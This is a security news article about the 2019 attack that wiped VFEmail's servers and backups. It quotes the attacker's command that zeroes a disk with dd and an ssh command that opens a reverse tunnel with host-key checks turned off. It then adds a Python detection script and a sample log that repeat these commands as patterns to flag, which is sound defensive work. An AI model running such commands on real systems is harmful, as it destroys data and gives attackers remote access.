A destructive cyberattack hit the email provider VFEmail. A hacker wiped the data on one of its servers in the United States, including the backup systems.
An unknown adversary launched a devastating cyberattack against the email provider VFEmail.
According to what has been established, the hacker erased data from the server, including backups, and 18 years of customer email were lost.
“We have suffered catastrophic destruction at the hands of a hacker. This person has destroyed all data in the US, both primary and backup systems. We are working to recover what data we can,” reads the statement published by the company on its website.
At this time, the attacker has formatted all the disks on every server. Every VM is lost. Every file server is lost, every backup server is lost. NL was 100% hosted with a vastly smaller dataset. NL backups by the provider were intact, and service should be up there.
— VFEmail.net (@VFEmail) February 11, 2019
On Monday, the email provider confirmed that its systems, spread across several data centers, became inaccessible after an incident.
The company watched the hacker as he was formatting a backup server hosted in the Netherlands.
Unfortunately, by then the hacker had already managed to wipe every disk on all of VFEmail's other servers.
The hacker destroyed every virtual machine, and apparently they did not share the same authentication.
“This was more than a multi-password via ssh exploit, and there was no ransom. Just attack and destroy,” VFEmail said.
According to the company, the hacker appears to have connected from Bulgaria.
Caught the perp in the middle of formatting the backup server:
dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
via: ssh -v -oStrictHostKeyChecking=no -oLogLevel=error -oUserKnownHostsFile=/dev/null [email protected] -R 127.0.0.1:30081:127.0.0.1:22 -N
— VFEmail.net (@VFEmail) February 11, 2019
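The two commands in the tweet above are the kind of thing a host-level detection should flag long before a backup server is zeroed: dd reading from /dev/zero straight into a raw block device, and an ssh client started with host-key verification disabled and a reverse tunnel (-R) back to the attacker. The following is an added example, not code from VFEmail or from this post; the log line format ("timestamp host=... uid=... cmd=...") and the sample entries are constructed for illustration.

```python
import re
import shlex

# Constructed sample process-execution log (not from VFEmail's systems).
# Assumed format: "<timestamp> host=<name> uid=<n> cmd=<command line>".
SAMPLE_LOG = """\
2019-02-11T03:12:44Z host=backup1 uid=0 cmd=dd if=/dev/zero of=/dev/da0 bs=4194304 seek=1024 count=399559
2019-02-11T03:12:50Z host=backup1 uid=0 cmd=ssh -v -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null user@203.0.113.5 -R 127.0.0.1:30081:127.0.0.1:22 -N
2019-02-11T03:13:02Z host=mail2 uid=1001 cmd=dd if=/backup/mail.img of=/tmp/restore.img bs=1M
2019-02-11T03:13:10Z host=mail2 uid=1001 cmd=ssh admin@backup1 tar czf - /var/mail
"""

# Whole-disk and partition device names on Linux and FreeBSD (da0 is the FreeBSD
# SCSI/virtual disk seen in the tweet); device-mapper volumes are included too.
BLOCK_DEV = re.compile(r"^/dev/(?:[shv]d[a-z]+|da\d+|ada\d+|nvme\d+n\d+|mapper/.+)\d*$")
WIPE_SOURCES = {"/dev/zero", "/dev/urandom", "/dev/random"}

def classify(cmd):
    """Return the list of finding labels for one executed command line."""
    try:
        argv = shlex.split(cmd)
    except ValueError:
        return ["unparseable command"]
    if not argv:
        return []
    findings = []
    tool = argv[0].rsplit("/", 1)[-1]          # tolerate /bin/dd, /usr/bin/ssh
    if tool == "dd":
        opts = dict(a.split("=", 1) for a in argv[1:] if "=" in a)
        if opts.get("if") in WIPE_SOURCES and BLOCK_DEV.match(opts.get("of", "")):
            findings.append("dd wiping raw block device")
    elif tool == "ssh":
        # Options may be passed as -oKey=val or "-o Key=val"; compare case-insensitively.
        lowered = [a.lower() for a in argv]
        if any("stricthostkeychecking=no" in a or "userknownhostsfile=/dev/null" in a
               for a in lowered):
            findings.append("ssh host-key verification disabled")
        if "-R" in argv:
            findings.append("ssh reverse tunnel (-R)")
    return findings

def scan(log_text):
    """Parse the assumed log format and return (timestamp, host, finding) alerts."""
    alerts = []
    for line in log_text.splitlines():
        m = re.match(r"(\S+) host=(\S+) uid=(\d+) cmd=(.*)", line)
        if m:
            ts, host, _uid, cmd = m.groups()
            alerts.extend((ts, host, f) for f in classify(cmd))
    return alerts
```

The legitimate restore (dd from an image file to a path under /tmp) and the ordinary ssh-to-backup-host invocation in the sample produce no alerts, so the rule is narrow enough to run continuously on admin hosts.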
The VFEmail team recommends that users not connect to the service, since all the content of their accounts was wiped by the hacker.
The good news is that the backups of the servers located in the Netherlands were not affected and were used to restore the whole service.
Pedro Tavares is a professional in the field of information security working as an Ethical Hacker/Pentester, Malware Researcher and also a Security Evangelist. He is also a founding member at CSIRT.UBI and Editor-in-Chief of the security computer blog seguranca-informatica.pt.
In recent years he has invested in the field of information security, exploring and analyzing a wide range of topics, such as pentesting (Kali Linux), malware, exploitation, hacking, IoT and security in Active Directory networks. He is also a freelance writer (Infosec Resources Institute and Cyber Defense Magazine) and developer of 0xSI_f33d, a feed that compiles phishing and malware campaigns targeting Portuguese citizens.